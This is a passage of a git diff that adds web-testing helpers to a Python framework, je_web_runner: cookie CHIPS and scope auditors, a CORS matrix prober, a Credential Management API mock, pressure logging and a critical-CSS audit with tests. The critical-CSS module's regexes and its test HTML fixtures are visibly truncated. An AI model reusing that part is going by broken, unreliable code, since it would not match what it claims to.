function () { return reactions.splice(0); }, + drainClosed: function () { return closed.splice(0); }, + active: function () { return observerActive; }, + }; +})(); +""" + + +@dataclass +class PressureReaction: + name: str + level: PressureLevel = PressureLevel.NOMINAL + ts_ms: int = 0 + + +@dataclass +class PressureLog: + reactions: List[PressureReaction] = field(default_factory=list) + disconnect_count: int = 0 + fires: List[PressureLevel] = field(default_factory=list) + + +def parse_log(payload: Any) -> PressureLog: + if not isinstance(payload, dict): + raise ComputePressureError("payload must be a dict") + reactions: List[PressureReaction] = [] + for raw in payload.get("reactions") or []: + if not isinstance(raw, dict): + continue + try: + level = PressureLevel(raw.get("level", PressureLevel.NOMINAL.value)) + except ValueError as exc: + raise ComputePressureError( + f"unknown pressure level {raw.get('level')!r}" + ) from exc + reactions.append(PressureReaction( + name=str(raw.get("name") or ""), + level=level, + ts_ms=int(raw.get("ts") or 0), + )) + fires: List[PressureLevel] = [] + for raw in payload.get("fires") or []: + try: + fires.append(PressureLevel(raw)) + except ValueError as exc: + raise ComputePressureError( + f"unknown fire level {raw!r}" + ) from exc + return PressureLog( + reactions=reactions, + disconnect_count=int(payload.get("disconnectCount") or 0), + fires=fires, + ) + + +def assert_reaction_to( + log: PressureLog, *, level: PressureLevel, name: Optional[str] = None, +) -> PressureReaction: + if not isinstance(level, PressureLevel): + raise ComputePressureError("level must be PressureLevel enum") + matches = [r for r in log.reactions + if _ORDER[r.level] >= _ORDER[level] + and (name is None or r.name == name)] + if not matches: + raise ComputePressureError( + f"no reaction at pressure >= {level.value}" + + (f" with name={name!r}" if name else "") + ) + return matches[0] + + +def assert_throttled_at_or_above( + log: PressureLog, *, level: PressureLevel, +) -> None: + """If the harness fired ``serious``/``critical``, the app *must* have + recorded at least one reaction at that or higher level.""" + fired_high = any(_ORDER[f] >= _ORDER[level] for f in log.fires) + if not fired_high: + return # no high-pressure firing → nothing to verify + high_reactions = [r for r in log.reactions + if _ORDER[r.level] >= _ORDER[level]] + if not high_reactions: + raise ComputePressureError( + f"harness fired {level.value}+ pressure but app never throttled " + f"({len(log.reactions)} total reactions, none >= {level.value})" + ) + + +def assert_observer_disconnected(log: PressureLog) -> None: + if log.disconnect_count == 0: + raise ComputePressureError( + "PressureObserver never disconnected — page leaks the observer" + ) diff --git a/je_web_runner/utils/cookie_chips_audit/__init__.py b/je_web_runner/utils/cookie_chips_audit/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/cookie_chips_audit/audit.py b/je_web_runner/utils/cookie_chips_audit/audit.py new file mode 100644 index 0000000..126bfd4 --- /dev/null +++ b/je_web_runner/utils/cookie_chips_audit/audit.py @@ -0,0 +1,193 @@ +""" +CHIPS (Cookies Having Independent Partitioned State) compliance auditor. + +Third-party iframes & ad-tech increasingly need ``Partitioned`` cookies +for cross-site embedding. This module audits a HAR (or list of +``Set-Cookie`` headers) and flags: + +* Third-party cookies missing ``Partitioned``. +* ``Partitioned`` without ``Secure`` (browsers reject these). +* ``Partitioned`` with ``SameSite=Lax/Strict`` (must be ``None``). +* First-party cookies that *unnecessarily* set ``Partitioned``. +""" +from __future__ import annotations + +from dataclasses import asdict, dataclass, field +from enum import Enum +from typing import Any, Dict, Iterable, List, Optional +from urllib.parse import urlparse + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class CookieChipsAuditError(WebRunnerException): + """Raised when input is malformed.""" + + +class Severity(str, Enum): + INFO = "info" + WARN = "warn" + ERROR = "error" + + +@dataclass +class SetCookie: + name: str + value: str = "" + attributes: Dict[str, Optional[str]] = field(default_factory=dict) + + @property + def is_partitioned(self) -> bool: + return "partitioned" in self.attributes + + @property + def is_secure(self) -> bool: + return "secure" in self.attributes + + @property + def samesite(self) -> str: + v = self.attributes.get("samesite") or "" + return v.lower() + + +def parse_set_cookie(header: str) -> SetCookie: + """Parse a single ``Set-Cookie`` header value.""" + if not isinstance(header, str) or "=" not in header.split(";", 1)[0]: + raise CookieChipsAuditError(f"invalid Set-Cookie header: {header!r}") + parts = [p.strip() for p in header.split(";")] + name, _, value = parts[0].partition("=") + attrs: Dict[str, Optional[str]] = {} + for part in parts[1:]: + if not part: + continue + if "=" in part: + k, _, v = part.partition("=") + attrs[k.strip().lower()] = v.strip() + else: + attrs[part.strip().lower()] = None + return SetCookie(name=name.strip(), value=value.strip(), attributes=attrs) + + +@dataclass +class Finding: + severity: Severity + rule: str + cookie: str + page_origin: str + cookie_origin: str + message: str + + def to_dict(self) -> Dict[str, Any]: + return {**asdict(self), "severity": self.severity.value} + + +def _registrable(host: str) -> str: + """Crude eTLD+1 — good enough for tests; production should use PSL.""" + parts = host.split(".") + if len(parts) <= 2: + return host + return ".".join(parts[-2:]) + + +def _is_third_party(page_url: str, cookie_url: str) -> bool: + p = urlparse(page_url).hostname or "" + c = urlparse(cookie_url).hostname or "" + return bool(p) and bool(c) and _registrable(p) != _registrable(c) + + +def _partitioned_findings( + cookie: SetCookie, third_party: bool, common: Dict[str, str], +) -> List[Finding]: + out: List[Finding] = [] + if not cookie.is_secure: + out.append(Finding( + severity=Severity.ERROR, rule="partitioned-requires-secure", + message="Partitioned cookie missing Secure (browser will reject).", + **common, + )) + if cookie.samesite != "none": + out.append(Finding( + severity=Severity.ERROR, rule="partitioned-requires-samesite-none", + message=(f"Partitioned cookie has SameSite=" + f"{cookie.samesite or 'unset'} (must be None)."), + **common, + )) + if not third_party: + out.append(Finding( + severity=Severity.WARN, rule="partitioned-on-first-party", + message="First-party cookie sets Partitioned — likely unnecessary.", + **common, + )) + return out + + +def _check_cookie( + cookie: SetCookie, page_url: str, cookie_url: str, +) -> List[Finding]: + third_party = _is_third_party(page_url, cookie_url) + common = { + "cookie": cookie.name, + "page_origin": urlparse(page_url).netloc, + "cookie_origin": urlparse(cookie_url).netloc, + } + if cookie.is_partitioned: + return _partitioned_findings(cookie, third_party, common) + if third_party: + return [Finding( + severity=Severity.ERROR, rule="third-party-missing-partitioned", + message="Third-party cookie without Partitioned will be blocked.", + **common, + )] + return [] + + +def _findings_for_entry(entry: Dict[str, Any], page_url: str) -> List[Finding]: + out: List[Finding] = [] + request_url = (entry.get("request") or {}).get("url", "") + headers = (entry.get("response") or {}).get("headers", []) or [] + for header in headers: + if (header.get("name") or "").lower() != "set-cookie": + continue + try: + cookie = parse_set_cookie(header.get("value", "")) + except CookieChipsAuditError: + continue + out.extend(_check_cookie(cookie, page_url, request_url)) + return out + + +def audit_har(har: Dict[str, Any], page_url: str) -> List[Finding]: + """Walk a HAR's responses and emit findings for every Set-Cookie header.""" + if not isinstance(har, dict): + raise CookieChipsAuditError("har must be a dict") + if not isinstance(page_url, str) or not page_url: + raise CookieChipsAuditError("page_url must be non-empty string") + entries = har.get("log", {}).get("entries", []) + if not isinstance(entries, list): + raise CookieChipsAuditError("har.log.entries must be a list") + findings: List[Finding] = [] + for entry in entries: + findings.extend(_findings_for_entry(entry, page_url)) + return findings + + +def audit_headers( + headers: Iterable[str], page_url: str, cookie_url: str, +) -> List[Finding]: + findings: List[Finding] = [] + for header in headers: + try: + cookie = parse_set_cookie(header) + except CookieChipsAuditError: + continue + findings.extend(_check_cookie(cookie, page_url, cookie_url)) + return findings + + +def assert_no_errors(findings: Iterable[Finding]) -> None: + errors = [f for f in findings if f.severity == Severity.ERROR] + if errors: + names = [f"{f.cookie}({f.rule})" for f in errors] + raise CookieChipsAuditError( + f"CHIPS audit errors: {names}" + ) diff --git a/je_web_runner/utils/cookie_scope_abuse/__init__.py b/je_web_runner/utils/cookie_scope_abuse/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/cookie_scope_abuse/scope.py b/je_web_runner/utils/cookie_scope_abuse/scope.py new file mode 100644 index 0000000..91c1b4a --- /dev/null +++ b/je_web_runner/utils/cookie_scope_abuse/scope.py @@ -0,0 +1,150 @@ +""" +Cookie domain / path scope abuse detection. + +Catches sloppy cookie config where: + +* A session cookie is set on the apex domain (``Domain=.example.com``) + instead of the marketing subdomain — exposes the session to XSS in + blog.example.com. +* A high-value cookie has ``Path=/`` instead of ``Path=/api``. +* The cookie lacks ``HttpOnly`` / ``Secure`` / ``SameSite=Strict|Lax`` + but stores something session-shaped (>= 20 chars, alphanumeric). +* Cookie name suggests session/auth (``sid`` / ``session`` / ``token`` / + ``jwt``) and one of the above is true. +""" +from __future__ import annotations + +import re +from dataclasses import asdict, dataclass +from enum import Enum +from typing import Any, Dict, Iterable, List + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class CookieScopeAbuseError(WebRunnerException): + """Raised on assertion failure or malformed input.""" + + +class Severity(str, Enum): + INFO = "info" + WARN = "warn" + ERROR = "error" + + +@dataclass +class CookieScopeFinding: + severity: Severity + rule: str + cookie: str + message: str + + def to_dict(self) -> Dict[str, Any]: + return {**asdict(self), "severity": self.severity.value} + + +_SESSION_LIKE_NAMES = re.compile( + r"(?:^|[_-])(sid|session|token|jwt|auth)(?:[_-]|$)", re.IGNORECASE, +) +_SESSION_LIKE_VALUE = re.compile(r"^[A-Za-z0-9._-]{20,}$") + + +def _looks_like_session(name: str, value: str) -> bool: + if _SESSION_LIKE_NAMES.search(name): + return True + return bool(_SESSION_LIKE_VALUE.match(value or "")) + + +@dataclass(frozen=True) +class _SessionCookie: + name: str + domain: str + path: str + http_only: bool + secure: bool + same_site: str + + +def _extract_session(cookie: Dict[str, Any]) -> _SessionCookie: + return _SessionCookie( + name=str(cookie.get("name") or ""), + domain=str(cookie.get("domain") or "").lstrip("."), + path=str(cookie.get("path") or "/"), + http_only=bool(cookie.get("httpOnly") or cookie.get("http_only")), + secure=bool(cookie.get("secure")), + same_site=(cookie.get("sameSite") or cookie.get("same_site") or "").lower(), + ) + + +def _scope_findings(c: _SessionCookie, page_host: str) -> List[CookieScopeFinding]: + out: List[CookieScopeFinding] = [] + page_apex = ".".join(page_host.split(".")[-2:]) + cookie_apex = ".".join(c.domain.split(".")[-2:]) if c.domain else page_apex + if c.domain and c.domain != page_host and cookie_apex == page_apex: + out.append(CookieScopeFinding( + severity=Severity.WARN, rule="session-on-apex", cookie=c.name, + message=f"session-like cookie {c.name!r} scoped to apex " + f"{c.domain!r} — leaks to every subdomain", + )) + if c.path == "/": + out.append(CookieScopeFinding( + severity=Severity.INFO, rule="session-path-root", cookie=c.name, + message=f"session-like cookie {c.name!r} uses Path=/ — " + "narrow to /api or /auth if possible", + )) + return out + + +def _security_findings(c: _SessionCookie) -> List[CookieScopeFinding]: + out: List[CookieScopeFinding] = [] + if not c.http_only: + out.append(CookieScopeFinding( + severity=Severity.ERROR, rule="session-no-httponly", cookie=c.name, + message=f"session-like cookie {c.name!r} missing HttpOnly — " + "JS can read it (XSS risk)", + )) + if not c.secure: + out.append(CookieScopeFinding( + severity=Severity.ERROR, rule="session-no-secure", cookie=c.name, + message=f"session-like cookie {c.name!r} missing Secure — " + "leaks over plain HTTP", + )) + if c.same_site not in ("strict", "lax"): + out.append(CookieScopeFinding( + severity=Severity.ERROR, rule="session-bad-samesite", cookie=c.name, + message=f"session-like cookie {c.name!r} uses SameSite=" + f"{c.same_site or 'unset'!r} — CSRF risk", + )) + return out + + +def audit_cookie( + cookie: Dict[str, Any], *, page_host: str, +) -> List[CookieScopeFinding]: + if not isinstance(cookie, dict): + raise CookieScopeAbuseError("cookie must be a dict") + if not isinstance(page_host, str) or not page_host: + raise CookieScopeAbuseError("page_host must be non-empty") + session = _extract_session(cookie) + value = str(cookie.get("value") or "") + if not _looks_like_session(session.name, value): + return [] + return _scope_findings(session, page_host) + _security_findings(session) + + +def audit_many( + cookies: Iterable[Dict[str, Any]], *, page_host: str, +) -> List[CookieScopeFinding]: + out: List[CookieScopeFinding] = [] + for c in cookies: + out.extend(audit_cookie(c, page_host=page_host)) + return out + + +def assert_no_errors(findings: Iterable[CookieScopeFinding]) -> None: + errors = [f for f in findings if f.severity == Severity.ERROR] + if errors: + details = [f"{f.cookie}({f.rule})" for f in errors] + raise CookieScopeAbuseError( + f"{len(errors)} cookie scope error(s): {details}" + ) diff --git a/je_web_runner/utils/cookie_store_api/__init__.py b/je_web_runner/utils/cookie_store_api/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/cookie_store_api/store.py b/je_web_runner/utils/cookie_store_api/store.py new file mode 100644 index 0000000..4ece3aa --- /dev/null +++ b/je_web_runner/utils/cookie_store_api/store.py @@ -0,0 +1,169 @@ +""" +Async ``cookieStore`` API helper:harvest + assert + subscribe / change-event +觀測。補 ``cookie_consent`` 缺的事件層 — 用 `document.cookie` 取不到 +HttpOnly cookie 也看不到 `change` event。 +""" +from __future__ import annotations + +from dataclasses import asdict, dataclass, field +from typing import Any, Dict, Iterable, List, Optional + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class CookieStoreApiError(WebRunnerException): + """Raised on bad payload or failed assertion.""" + + +# ---------- model ------------------------------------------------------- + +@dataclass(frozen=True) +class CookieRecord: + """One cookieStore.get() entry.""" + + name: str + value: str + domain: Optional[str] = None + path: str = "/" + secure: bool = True + same_site: str = "strict" + expires: Optional[int] = None # epoch ms + + def to_dict(self) -> Dict[str, Any]: + return asdict(self) + + +@dataclass +class ChangeEvent: + """One ``cookiechange`` event observed via cookieStore subscription.""" + + changed: List[CookieRecord] = field(default_factory=list) + deleted: List[str] = field(default_factory=list) + timestamp_ms: float = 0.0 + + +# ---------- scripts ----------------------------------------------------- + +GET_ALL_SCRIPT = """ +(async function() { + if (!('cookieStore' in window)) return []; + return await cookieStore.getAll(); +})(); +""".strip() + + +def install_change_listener_script() -> str: + """Return JS that wires a change-event recorder to ``window.__wr_cs__``.""" + return ( + "(function() {" + " if (window.__wr_cs_installed__) return;" + " window.__wr_cs_installed__ = true;" + " window.__wr_cs__ = [];" + " if (!('cookieStore' in window)) return;" + " cookieStore.addEventListener('change', function(e) {" + " window.__wr_cs__.push({" + " changed: (e.changed||[]).map(function(c){return {" + " name: c.name, value: c.value, domain: c.domain," + " path: c.path, secure: c.secure, same_site: c.sameSite," + " expires: c.expires" + " };})," + " deleted: (e.deleted||[]).map(function(c){return c.name;})," + " timestamp_ms: performance.now()" + " });" + " });" + "})();" + ) + + +HARVEST_CHANGES_SCRIPT = "return window.__wr_cs__ || [];" + + +# ---------- parsing ----------------------------------------------------- + +def parse_cookies(payload: Any) -> List[CookieRecord]: + """Convert ``cookieStore.getAll()`` result to typed records.""" + if not isinstance(payload, list): + raise CookieStoreApiError( + f"cookies payload must be list, got {type(payload).__name__}" + ) + out: List[CookieRecord] = [] + for raw in payload: + if not isinstance(raw, dict) or "name" not in raw: + continue + out.append(CookieRecord( + name=str(raw["name"]), + value=str(raw.get("value") or ""), + domain=raw.get("domain"), + path=str(raw.get("path") or "/"), + secure=bool(raw.get("secure", True)), + same_site=str(raw.get("same_site") or raw.get("sameSite") or "strict"), + expires=raw.get("expires"), + )) + return out + + +def parse_change_events(payload: Any) -> List[ChangeEvent]: + """Convert harvested change-event log to typed records.""" + if not isinstance(payload, list): + raise CookieStoreApiError( + f"change events payload must be list, got {type(payload).__name__}" + ) + out: List[ChangeEvent] = [] + for raw in payload: + if not isinstance(raw, dict): + continue + out.append(ChangeEvent( + changed=parse_cookies(raw.get("changed") or []), + deleted=[str(d) for d in (raw.get("deleted") or [])], + timestamp_ms=float(raw.get("timestamp_ms") or 0.0), + )) + return out + + +# ---------- assertions -------------------------------------------------- + +def assert_cookie_present( + cookies: Iterable[CookieRecord], *, name: str, value: Optional[str] = None, +) -> CookieRecord: + """Assert a cookie with name (and optional value) is present.""" + if not isinstance(name, str) or not name: + raise CookieStoreApiError("name must be non-empty string") + for c in cookies: + if c.name == name: + if value is not None and c.value != value: + raise CookieStoreApiError( + f"cookie {name} value is {c.value!r}, want {value!r}" + ) + return c + raise CookieStoreApiError(f"cookie {name!r} not present") + + +def assert_cookie_absent( + cookies: Iterable[CookieRecord], *, name: str, +) -> None: + for c in cookies: + if c.name == name: + raise CookieStoreApiError(f"cookie {name!r} unexpectedly present") + + +def assert_change_for( + events: Iterable[ChangeEvent], *, name: str, +) -> ChangeEvent: + """Assert at least one change event mentions ``name`` (changed or deleted).""" + for event in events: + if any(c.name == name for c in event.changed): + return event + if name in event.deleted: + return event + raise CookieStoreApiError( + f"no change event mentions cookie {name!r}" + ) + + +def assert_secure_only(cookies: Iterable[CookieRecord]) -> None: + """Assert every cookie has secure=True (HTTPS-only).""" + insecure = [c.name for c in cookies if not c.secure] + if insecure: + raise CookieStoreApiError( + f"non-secure cookies present: {insecure}" + ) diff --git a/je_web_runner/utils/cors_matrix/__init__.py b/je_web_runner/utils/cors_matrix/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/cors_matrix/matrix.py b/je_web_runner/utils/cors_matrix/matrix.py new file mode 100644 index 0000000..a7089cb --- /dev/null +++ b/je_web_runner/utils/cors_matrix/matrix.py @@ -0,0 +1,187 @@ +""" +完整 ``verb × origin × credentials`` CORS preflight + simple-request 矩陣探測。 +Most apps test the 1-2 common CORS combos and miss edge cases: +``OPTIONS`` with ``Authorization`` header, credentialed ``DELETE`` from +a subdomain, ``Origin: null`` (file://, sandboxed iframes), etc. + +This module: + +1. Builds the request matrix (default = all combinations). +2. Hands each ``(verb, origin, with_credentials)`` triplet to a + user-supplied probe callable. +3. Classifies the response as ALLOWED / BLOCKED / AMBIGUOUS. +""" +from __future__ import annotations + +from dataclasses import asdict, dataclass +from enum import Enum +from itertools import product +from typing import Any, Callable, Dict, List, Optional, Sequence + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class CorsMatrixError(WebRunnerException): + """Raised on bad inputs or probe failure.""" + + +class CorsOutcome(str, Enum): + ALLOWED = "allowed" + BLOCKED = "blocked" + AMBIGUOUS = "ambiguous" + + +_PREFLIGHT_VERBS = {"PUT", "PATCH", "DELETE"} + + +# ---------- matrix ------------------------------------------------------ + +@dataclass(frozen=True) +class CorsCase: + """One row of the matrix.""" + + verb: str + origin: str + with_credentials: bool + + def needs_preflight(self) -> bool: + return self.verb.upper() in _PREFLIGHT_VERBS + + +def build_matrix( + *, + verbs: Sequence[str] = ("GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS"), + origins: Sequence[str] = ( + "https://app.example", # same-org subdomain + "https://other.example", # cross-origin + "null", # sandboxed iframe / data: + ), + credentials_modes: Sequence[bool] = (False, True), +) -> List[CorsCase]: + """Cartesian product of the matrix axes.""" + if not verbs: + raise CorsMatrixError("verbs must be non-empty") + if not origins: + raise CorsMatrixError("origins must be non-empty") + if not credentials_modes: + raise CorsMatrixError("credentials_modes must be non-empty") + return [ + CorsCase(verb=v.upper(), origin=o, with_credentials=c) + for v, o, c in product(verbs, origins, credentials_modes) + ] + + +# ---------- probe / classify ------------------------------------------- + +@dataclass +class CorsResponse: + """What the probe callable must return.""" + + status_code: int + allow_origin: Optional[str] + allow_credentials: bool = False + allow_methods: Sequence[str] = () + allow_headers: Sequence[str] = () + + +@dataclass +class CorsResult: + """Per-case outcome.""" + + case: CorsCase + outcome: CorsOutcome + response: CorsResponse + note: str = "" + + def to_dict(self) -> Dict[str, Any]: + return { + "case": asdict(self.case), + "outcome": self.outcome.value, + "response": asdict(self.response), + "note": self.note, + } + + +def classify(case: CorsCase, response: CorsResponse) -> CorsResult: + """Apply standard CORS rules to decide allowed/blocked/ambiguous.""" + if not isinstance(response, CorsResponse): + raise CorsMatrixError("response must be CorsResponse") + if response.status_code >= 500: + return CorsResult(case=case, outcome=CorsOutcome.AMBIGUOUS, + response=response, note=f"server error {response.status_code}") + origin_ok = ( + response.allow_origin == "*" + or response.allow_origin == case.origin + or (case.origin == "null" and response.allow_origin == "null") + ) + if case.with_credentials: + # Spec: cannot combine ACAO=* with credentials. + if response.allow_origin == "*": + return CorsResult(case=case, outcome=CorsOutcome.BLOCKED, + response=response, note="ACAO=* incompatible with credentials") + if not response.allow_credentials: + return CorsResult(case=case, outcome=CorsOutcome.BLOCKED, + response=response, note="ACA-Credentials missing/false") + if not origin_ok: + return CorsResult(case=case, outcome=CorsOutcome.BLOCKED, + response=response, + note=f"origin {case.origin} not in ACAO {response.allow_origin}") + if case.needs_preflight() and case.verb.upper() not in (m.upper() for m in response.allow_methods): + return CorsResult(case=case, outcome=CorsOutcome.BLOCKED, + response=response, + note=f"verb {case.verb} missing from ACA-Methods") + return CorsResult(case=case, outcome=CorsOutcome.ALLOWED, response=response) + + +ProbeFn = Callable[[CorsCase], CorsResponse] + + +def run_matrix( + cases: Sequence[CorsCase], probe: ProbeFn, +) -> List[CorsResult]: + """Drive ``probe`` once per case and classify the response.""" + if not cases: + raise CorsMatrixError("cases must be non-empty") + if not callable(probe): + raise CorsMatrixError("probe must be callable") + out: List[CorsResult] = [] + for case in cases: + try: + response = probe(case) + except Exception as error: + raise CorsMatrixError( + f"probe failed for {case}: {error!r}" + ) from error + out.append(classify(case, response)) + return out + + +# ---------- assertions -------------------------------------------------- + +def assert_origin_blocked( + results: Sequence[CorsResult], *, origin: str, +) -> None: + """Assert every result for ``origin`` is BLOCKED (origin must NOT be allow-listed).""" + leaked = [ + r for r in results + if r.case.origin == origin and r.outcome == CorsOutcome.ALLOWED + ] + if leaked: + verbs = sorted({r.case.verb for r in leaked}) + raise CorsMatrixError( + f"origin {origin!r} unexpectedly allowed for verbs: {verbs}" + ) + + +def assert_credentials_require_explicit_origin( + results: Sequence[CorsResult], +) -> None: + """Assert no result combines ACAO=* with credentials=true.""" + bad = [ + r for r in results + if r.case.with_credentials and r.response.allow_origin == "*" + ] + if bad: + raise CorsMatrixError( + f"{len(bad)} responses returned ACAO=* with credentials — spec violation" + ) diff --git a/je_web_runner/utils/credential_management/__init__.py b/je_web_runner/utils/credential_management/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/credential_management/credentials.py b/je_web_runner/utils/credential_management/credentials.py new file mode 100644 index 0000000..69cc745 --- /dev/null +++ b/je_web_runner/utils/credential_management/credentials.py @@ -0,0 +1,178 @@ +""" +Credential Management API mock. + +Distinct from WebAuthn (covered in [[webauthn_mock]]), the Credential +Management API exposes: + +* ``PasswordCredential`` (legacy username/password autofill). +* ``FederatedCredential`` (Sign-in with Google/Facebook). +* ``navigator.credentials.preventSilentAccess``. + +This module installs a shim that: + +* Returns seeded credentials from ``get``. +* Records every ``store`` call so the test can assert "did the page + remember the password?". +* Records ``preventSilentAccess`` calls so tests can verify logout + hygiene. +""" +from __future__ import annotations + +from dataclasses import asdict, dataclass, field +from typing import Any, Dict, List + +from je_web_runner.utils.exception.exceptions import WebRunnerException + + +class CredentialManagementError(WebRunnerException): + """Raised on malformed input or assertion failure.""" + + +INSTALL_SCRIPT = r""" +(function (seed) { + if (window.__wr_cm__) return; + const store = []; // store() calls + const gets = []; // get() calls + let preventCount = 0; + const seeded = (seed && seed.credentials) || []; + const cmApi = { + get: async function (opts) { + gets.push(opts); + if (!seeded.length) return null; + const c = seeded[0]; + return { + id: c.id, type: c.type || 'password', + name: c.name, iconURL: c.iconURL, + password: c.password, provider: c.provider, + }; + }, + store: async function (cred) { + store.push({ + id: cred.id, type: cred.type || 'password', + password: cred.password || '', provider: cred.provider || '', + }); + return cred; + }, + preventSilentAccess: async function () { preventCount++; }, + create: async function (opts) { + return {id: opts.password ? opts.password.id : 'mock', + type: opts.password ? 'password' : 'federated', + ...(opts.password || {}), + ...(opts.federated || {})}; + }, + }; + navigator.credentials = Object.assign(navigator.credentials || {}, cmApi); + window.__wr_cm__ = { + drainStored: function () { return store.splice(0); }, + drainGets: function () { return gets.splice(0); }, + preventCount: function () { return preventCount; }, + }; +})(arguments[0]); +""" + + +@dataclass +class SeedCredential: + id: str + type: str = "password" # "password" | "federated" + name: str = "" + password: str = "" + provider: str = "" + + def to_dict(self) -> Dict[str, Any]: + return asdict(self) + + +def build_seed(credentials: List[SeedCredential]) -> Dict[str, Any]: + if not isinstance(credentials, list): + raise CredentialManagementError("credentials must be a list") + for c in credentials: + if not isinstance(c, SeedCredential) or not c.id: + raise CredentialManagementError( + "every entry must be SeedCredential with non-empty id" + ) + return {"credentials": [c.to_dict() for c in credentials]} + + +@dataclass +class StoredCall: + id: str = "" + type: str = "" + password: str = "" + provider: str = "" + + +@dataclass +class CmLog: + stored: List[StoredCall] = field(default_factory=list) + gets: List[Dict[str, Any]] = field(default_factory=list) + prevent_count: int = 0 + + +def parse_log(payload: Any) -> CmLog: + if not isinstance(payload, dict): + raise CredentialManagementError("payload must be a dict") + stored_raw = payload.get("stored") or [] + if not isinstance(stored_raw, list): + raise CredentialManagementError("stored must be a list") + stored = [] + for raw in stored_raw: + if not isinstance(raw, dict): + continue + stored.append(StoredCall( + id=str(raw.get("id") or ""), + type=str(raw.get("type") or "password"), + password=str(raw.get("password") or ""), + provider=str(raw.get("provider") or ""), + )) + return CmLog( + stored=stored, + gets=list(payload.get("gets") or []), + prevent_count=int(payload.get("preventCount") or 0), + ) + + +def assert_stored(log: CmLog, *, credential_id: str) -> StoredCall: + if not credential_id: + raise CredentialManagementError("credential_id must be non-empty") + for s in log.stored: + if s.id == credential_id: + return s + raise CredentialManagementError( + f"page never called credentials.store for id={credential_id!r}" + ) + + +def assert_no_password_in_clear(log: CmLog) -> None: + """Belt-and-braces: ensure no plaintext password was *also* logged.""" + leaked = [s for s in log.stored if s.password and len(s.password) > 0] + if leaked: + raise CredentialManagementError( + f"{len(leaked)} stored credential(s) leaked plaintext password " + "into the test harness — page should not expose .password back" + ) + + +def assert_prevent_silent_access_called(log: CmLog, *, at_least: int = 1) -> None: + if at_least < 1: + raise CredentialManagementError("at_least must be >= 1") + if log.prevent_count < at_least: + raise CredentialManagementError( + f"preventSilentAccess called {log.prevent_count} times, " + f"expected >= {at_least} (logout did not clear silent sign-in)" + ) + + +def assert_get_requested_mediation( + log: CmLog, *, mediation: str = "required", +) -> None: + if mediation not in ("silent", "optional", "required", "conditional"): + raise CredentialManagementError(f"unknown mediation {mediation!r}") + for opts in log.gets: + if not isinstance(opts, dict): + continue + if opts.get("mediation") != mediation: + raise CredentialManagementError( + f"credentials.get used mediation={opts.get('mediation')!r}, " + f"expected {mediation!r}" + ) diff --git a/je_web_runner/utils/critical_css_audit/__init__.py b/je_web_runner/utils/critical_css_audit/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/je_web_runner/utils/critical_css_audit/audit.py b/je_web_runner/utils/critical_css_audit/audit.py new file mode 100644 index 0000000..eef41b4 --- /dev/null +++ b/je_web_runner/utils/critical_css_audit/audit.py @@ -0,0 +1,99 @@ +""" +Critical-CSS inline audit. + +Above-the-fold CSS should be inlined inside ``", re.IGNORECASE | re.DOTALL, +) +_LINK_RE = re.compile(r"]*>", re.IGNORECASE) +_HEAD_RE = re.compile(r"]*>(.*?)", re.IGNORECASE | re.DOTALL) + + +def _attr(tag: str, name: str) -> str: + match = re.search(rf'{name}\s*=\s*[\'"]?([^\'"\s>]+)[\'"]?', + tag, re.IGNORECASE) + return match.group(1) if match else "" + + +def analyse(html: str) -> CssReport: + if not isinstance(html, str): + raise CriticalCssAuditError("html must be a string") + head_match = _HEAD_RE.search(html) + head = head_match.group(1) if head_match else html + inline_blocks = _STYLE_BLOCK_RE.findall(head) + report = CssReport( + inline_blocks=len(inline_blocks), + inline_bytes=sum(len(b.encode("utf-8")) for b in inline_blocks), + ) + for tag in _LINK_RE.findall(head): + rel = _attr(tag, "rel").lower() + href = _attr(tag, "href") + if rel == "stylesheet" and href and "media=\"print\"" not in tag.lower(): + disabled = "disabled" in tag.lower() + if not disabled: + report.external_blocking.append(href) + if rel == "preload" and _attr(tag, "as").lower() == "style": + report.preloaded.append(href) + return report + + +def assert_has_inline_critical(report: CssReport) -> None: + if report.inline_blocks == 0: + raise CriticalCssAuditError( + "no inline + + + +""" + +NO_INLINE = """ + + + +""" + + +class TestAnalyse(unittest.TestCase): + + def test_basic(self): + r = analyse(GOOD) + self.assertEqual(r.inline_blocks, 1) + self.assertIn("/main.css", r.external_blocking) + self.assertIn("/main.css", r.preloaded) + + def test_no_head(self): + r = analyse("") + self.assertEqual(r.inline_blocks, 1) + + def test_print_skipped(self): + r = analyse('') + self.assertEqual(r.external_blocking, []) + + def test_bad(self): + with self.assertRaises(CriticalCssAuditError): + analyse(123) # NOSONAR python:S5655 - deliberate bad input + + +class TestInline(unittest.TestCase): + + def test_pass(self): + assert_has_inline_critical(CssReport(inline_blocks=1)) + + def test_fail(self): + with self.assertRaises(CriticalCssAuditError): + assert_has_inline_critical(CssReport()) + + +class TestBudget(unittest.TestCase): + + def test_pass(self): + assert_inline_within_budget(CssReport(inline_bytes=1024)) + + def test_fail(self): + with self.assertRaises(CriticalCssAuditError): + assert_inline_within_budget(CssReport(inline_bytes=20_000)) + + def test_bad_max(self): + with self.assertRaises(CriticalCssAuditError): + assert_inline_within_budget(CssReport(), max_bytes=0) + + +class TestPreloaded(unittest.TestCase): + + def test_pass(self): + assert_external_preloaded(CssReport( + external_blocking=["/a.css"], preloaded=["/a.css"], + )) + + def test_fail(self): + with self.assertRaises(CriticalCssAuditError): + assert_external_preloaded(CssReport( + external_blocking=["/a.css"], preloaded=[], + )) + + +if __name__ == "__main__": + unittest.main() diff --git a/test/unit_test/test_csp_violation_parser.py b/test/unit_test/test_csp_violation_parser.py new file mode 100644 index 0000000..4eae5bb --- /dev/null +++ b/test/unit_test/test_csp_violation_parser.py @@ -0,0 +1,116 @@ +"""Unit tests for je_web_runner.utils.csp_violation_parser.""" +import unittest + +from je_web_runner.utils.csp_violation_parser.parser import ( + CspViolationParserError, + Violation, + assert_no_enforced_violations, + group_by_directive, + looks_like_recon, + parse_many, + parse_one, + top_blocked_hosts, +) + + +LEGACY = { + "csp-report": { + "document-uri": "https://example.com/", + 